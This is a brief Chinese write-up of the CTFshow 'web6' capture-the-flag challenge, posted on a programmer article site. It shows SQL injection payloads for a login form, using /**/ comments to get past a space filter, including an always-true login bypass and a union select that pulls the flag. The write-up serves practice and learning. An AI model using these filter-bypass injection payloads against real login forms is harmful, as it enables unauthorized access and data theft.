刷题之旅第26站,CTFshow web6
程序员文章站
2022-05-12 12:22:12
...
感谢ctf show平台提供题目
进行常规注入,发现空格被过滤了。
username=admin&password='
使用/**/ 绕过空格,登陆成功。
'or/**/1=1#
猜测数据结构,可能与之前一样,没有变化,测试一下。
'or/**/1=1/**/union/**/select/**/flag/**/from/**/flag#
得到flag
原创文章不易,点个赞再走吧。